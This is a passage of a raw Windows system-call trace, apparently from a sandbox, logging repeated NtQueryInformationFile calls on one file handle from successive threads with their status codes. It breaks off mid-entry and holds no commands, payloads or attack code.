[0165.849] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359f8b0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359f8b0, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1831 os_tid = 0x6cc [0165.853] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fd40, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fd40, FileInformation=0x210e20) returned 0x0 Thread: id = 1832 os_tid = 0x694 [0165.855] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fd68, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fd68, FileInformation=0x210e20) returned 0x0 Thread: id = 1833 os_tid = 0x6d8 [0165.857] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fd80, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fd80, FileInformation=0x210e20) returned 0x0 Thread: id = 1834 os_tid = 0x87c [0165.862] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373f878, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373f878, FileInformation=0x210e20) returned 0x0 Thread: id = 1835 os_tid = 0xb88 [0165.864] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fcc8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fcc8, FileInformation=0x210e20) returned 0x0 Thread: id = 1836 os_tid = 0xb8c [0165.866] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ff9d0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ff9d0, FileInformation=0x210e20) returned 0x0 Thread: id = 1837 os_tid = 0x700 [0165.868] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bfc28, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bfc28, FileInformation=0x210e20) returned 0x0 Thread: id = 1838 os_tid = 0x6f0 [0165.870] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367f918, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367f918, FileInformation=0x210e20) returned 0x0 Thread: id = 1839 os_tid = 0x130 [0165.875] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371f870, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371f870, FileInformation=0x210e20) returned 0x0 Thread: id = 1840 os_tid = 0x754 [0165.877] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367fa88, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367fa88, FileInformation=0x210e20) returned 0x0 Thread: id = 1841 os_tid = 0x72c [0165.883] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fd98, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fd98, FileInformation=0x210e20) returned 0x0 Thread: id = 1842 os_tid = 0x748 [0165.888] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fbb8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fbb8, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 1843 os_tid = 0x928 [0165.890] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363fe70, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363fe70, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 1844 os_tid = 0xcc [0165.891] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363fa58, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363fa58, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 1845 os_tid = 0xd0 [0165.893] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fac8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fac8, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 1846 os_tid = 0xd4 [0165.895] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375f790, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375f790, FileInformation=0x210e20) returned 0x0 Thread: id = 1847 os_tid = 0xd8 [0165.902] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fb60, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fb60, FileInformation=0x210e20) returned 0x0 Thread: id = 1848 os_tid = 0xdc [0165.904] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ff918, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ff918, FileInformation=0x210e20) returned 0x0 Thread: id = 1849 os_tid = 0xe0 [0165.906] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363fd00, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363fd00, FileInformation=0x210e20) returned 0xc000000d Thread: id = 1850 os_tid = 0xe4 [0165.908] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fe08, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fe08, FileInformation=0x210e20) returned 0x0 Thread: id = 1851 os_tid = 0xe8 [0165.910] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fab0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fab0, FileInformation=0x210e20) returned 0x0 Thread: id = 1852 os_tid = 0xec [0165.912] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ffd18, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ffd18, FileInformation=0x210e20) returned 0x0 Thread: id = 1853 os_tid = 0x9d8 [0165.914] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fdb0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fdb0, FileInformation=0x210e20) returned 0x0 Thread: id = 1854 os_tid = 0x898 [0165.916] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fd20, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fd20, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 1855 os_tid = 0x48c [0165.918] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371f9a0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371f9a0, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 1856 os_tid = 0x6a4 [0165.919] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bfbe0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bfbe0, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 1857 os_tid = 0x20c [0165.921] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bfde0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bfde0, FileInformation=0x210e20) returned 0x0 Thread: id = 1858 os_tid = 0x630 [0165.923] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365f998, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365f998, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1859 os_tid = 0x5e4 [0165.925] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fb38, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fb38, FileInformation=0x210e20) returned 0x0 Thread: id = 1860 os_tid = 0xb28 [0165.927] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ffc28, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ffc28, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 1861 os_tid = 0xb20 [0165.929] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fc28, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fc28, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 1862 os_tid = 0x704 [0165.931] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ff7d8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ff7d8, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 1863 os_tid = 0x568 [0165.936] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363fa18, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363fa18, FileInformation=0x210e20) returned 0x0 Thread: id = 1864 os_tid = 0x5ac [0165.941] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363fc28, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363fc28, FileInformation=0x210e20) returned 0xc000000d Thread: id = 1865 os_tid = 0x908 [0165.943] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35fff38, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35fff38, FileInformation=0x210e20) returned 0x0 Thread: id = 1866 os_tid = 0x888 [0165.947] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fd08, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fd08, FileInformation=0x210e20) returned 0x0 Thread: id = 1867 os_tid = 0x544 [0165.949] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fb90, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fb90, FileInformation=0x210e20) returned 0x0 Thread: id = 1868 os_tid = 0x76c [0165.951] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffc68, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffc68, FileInformation=0x210e20) returned 0x0 Thread: id = 1869 os_tid = 0xa9c [0165.953] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fad8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fad8, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1870 os_tid = 0x114 [0165.955] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367fb08, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367fb08, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1871 os_tid = 0x5b8 [0165.957] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bf850, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bf850, FileInformation=0x210e20) returned 0x0 Thread: id = 1872 os_tid = 0x814 [0165.958] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bfd40, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bfd40, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1873 os_tid = 0x834 [0165.960] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365ff30, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365ff30, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1874 os_tid = 0x884 [0165.963] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bf940, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bf940, FileInformation=0x210e20) returned 0x0 Thread: id = 1875 os_tid = 0x5d4 [0165.965] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bfc20, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bfc20, FileInformation=0x210e20) returned 0x0 Thread: id = 1876 os_tid = 0x340 [0165.970] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfc30, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfc30, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 1877 os_tid = 0x810 [0165.972] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35df7d8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35df7d8, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1878 os_tid = 0x830 [0165.974] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363f8d0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363f8d0, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1879 os_tid = 0x880 [0165.976] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371faf0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371faf0, FileInformation=0x210e20) returned 0xc00000bb Thread: id = 1880 os_tid = 0xae4 [0165.977] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffcb8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffcb8, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1881 os_tid = 0x570 [0165.979] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fe30, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fe30, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1882 os_tid = 0xb40 [0165.984] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bf7a0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bf7a0, FileInformation=0x210e20) returned 0x0 Thread: id = 1883 os_tid = 0x5f4 [0165.986] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371feb0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371feb0, FileInformation=0x210e20) returned 0x0 Thread: id = 1884 os_tid = 0xbb8 [0165.988] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371f7c0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371f7c0, FileInformation=0x210e20) returned 0x0 Thread: id = 1885 os_tid = 0x598 [0165.990] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371f8c0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371f8c0, FileInformation=0x210e20) returned 0x0 Thread: id = 1886 os_tid = 0x4e4 [0165.993] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363fd78, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363fd78, FileInformation=0x210e20) returned 0x0 Thread: id = 1887 os_tid = 0xbfc [0165.995] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfa20, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfa20, FileInformation=0x210e20) returned 0x0 Thread: id = 1888 os_tid = 0x80c [0165.997] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369f938, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369f938, FileInformation=0x210e20) returned 0x0 Thread: id = 1889 os_tid = 0xbf8 [0165.999] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfcb8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfcb8, FileInformation=0x210e20) returned 0x0 Thread: id = 1890 os_tid = 0x524 [0166.001] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fc88, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fc88, FileInformation=0x210e20) returned 0x0 Thread: id = 1891 os_tid = 0x674 [0166.003] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363fcd0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363fcd0, FileInformation=0x210e20) returned 0x0 Thread: id = 1892 os_tid = 0x4a0 [0166.005] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ff940, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ff940, FileInformation=0x210e20) returned 0x0 Thread: id = 1893 os_tid = 0x5d8 [0166.007] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffb78, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffb78, FileInformation=0x210e20) returned 0x0 Thread: id = 1894 os_tid = 0x69c [0166.009] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fb28, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fb28, FileInformation=0x210e20) returned 0x0 Thread: id = 1895 os_tid = 0xb74 [0166.011] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fa88, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fa88, FileInformation=0x210e20) returned 0x0 Thread: id = 1896 os_tid = 0x6a8 [0166.014] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367f940, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367f940, FileInformation=0x210e20) returned 0x0 Thread: id = 1897 os_tid = 0xb68 [0166.016] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363ff10, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363ff10, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1898 os_tid = 0x758 [0166.018] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bf940, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bf940, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1899 os_tid = 0x3d4 [0166.020] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bfa48, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bfa48, FileInformation=0x210e20) returned 0x0 Thread: id = 1900 os_tid = 0x484 [0166.022] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ff808, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ff808, FileInformation=0x210e20) returned 0x0 Thread: id = 1901 os_tid = 0xb4c [0166.024] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361ff20, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361ff20, FileInformation=0x210e20) returned 0x0 Thread: id = 1902 os_tid = 0xa1c [0166.029] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bf858, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bf858, FileInformation=0x210e20) returned 0x0 Thread: id = 1903 os_tid = 0x2ac [0166.031] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bf888, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bf888, FileInformation=0x210e20) returned 0x0 Thread: id = 1904 os_tid = 0xa8c [0166.034] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fab8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fab8, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 1905 os_tid = 0x68c [0166.040] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ff858, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ff858, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1906 os_tid = 0x388 [0166.042] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363fa78, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363fa78, FileInformation=0x210e20) returned 0x0 Thread: id = 1907 os_tid = 0xa50 [0166.044] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fa58, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fa58, FileInformation=0x210e20) returned 0x0 Thread: id = 1908 os_tid = 0x75c [0166.046] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363fb90, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363fb90, FileInformation=0x210e20) returned 0x0 Thread: id = 1909 os_tid = 0x240 [0166.048] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367f888, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367f888, FileInformation=0x210e20) returned 0x0 Thread: id = 1910 os_tid = 0x320 [0166.050] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365f8a0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365f8a0, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 1911 os_tid = 0x3b4 [0166.055] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fae0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fae0, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1912 os_tid = 0x760 [0166.057] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bff50, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bff50, FileInformation=0x210e20) returned 0x0 Thread: id = 1913 os_tid = 0xb00 [0166.059] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fb00, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fb00, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1914 os_tid = 0x7fc [0166.061] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369f858, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369f858, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1915 os_tid = 0xb18 [0166.063] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fa10, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fa10, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1916 os_tid = 0xa68 [0166.065] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfb30, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfb30, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1917 os_tid = 0x224 [0166.067] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfb60, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfb60, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1918 os_tid = 0x2c4 [0166.069] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fc78, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fc78, FileInformation=0x210e20) returned 0x0 Thread: id = 1919 os_tid = 0x24c [0166.071] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357f7d8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357f7d8, FileInformation=0x210e20) returned 0x0 Thread: id = 1920 os_tid = 0x4e8 [0166.073] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359f8a0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359f8a0, FileInformation=0x210e20) returned 0x0 Thread: id = 1921 os_tid = 0x220 [0166.074] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfb80, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfb80, FileInformation=0x210e20) returned 0x0 Thread: id = 1922 os_tid = 0xb04 [0166.077] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fc88, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fc88, FileInformation=0x210e20) returned 0x0 Thread: id = 1923 os_tid = 0x180 [0166.079] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fa00, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fa00, FileInformation=0x210e20) returned 0x0 Thread: id = 1924 os_tid = 0x53c [0166.081] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35df978, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35df978, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 1925 os_tid = 0x5b4 [0166.086] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bf9a0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bf9a0, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 1926 os_tid = 0x614 [0166.091] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fde8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fde8, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 1927 os_tid = 0x690 [0166.093] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35df960, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35df960, FileInformation=0x210e20) returned 0x0 Thread: id = 1928 os_tid = 0x440 [0166.095] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfe50, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfe50, FileInformation=0x210e20) returned 0x0 Thread: id = 1929 os_tid = 0x7d8 [0166.097] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fe70, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fe70, FileInformation=0x210e20) returned 0x0 Thread: id = 1930 os_tid = 0xa60 [0166.099] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffaf8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffaf8, FileInformation=0x210e20) returned 0x0 Thread: id = 1931 os_tid = 0xb24 [0166.105] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fd28, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fd28, FileInformation=0x210e20) returned 0x0 Thread: id = 1932 os_tid = 0x878 [0166.107] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375f7f8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375f7f8, FileInformation=0x210e20) returned 0x0 Thread: id = 1933 os_tid = 0xb1c [0166.110] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367fc78, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367fc78, FileInformation=0x210e20) returned 0x0 Thread: id = 1934 os_tid = 0xb08 [0166.111] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ff898, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ff898, FileInformation=0x210e20) returned 0x0 Thread: id = 1935 os_tid = 0x4fc [0166.113] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fb80, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fb80, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 1936 os_tid = 0x4dc [0166.115] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bfed0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bfed0, FileInformation=0x210e20) returned 0x0 Thread: id = 1937 os_tid = 0x43c [0166.117] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373f958, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373f958, FileInformation=0x210e20) returned 0x0 Thread: id = 1938 os_tid = 0x1c4 [0166.119] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363faf8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363faf8, FileInformation=0x210e20) returned 0x0 Thread: id = 1939 os_tid = 0xbec [0166.121] NtQueryInformationFile (in: 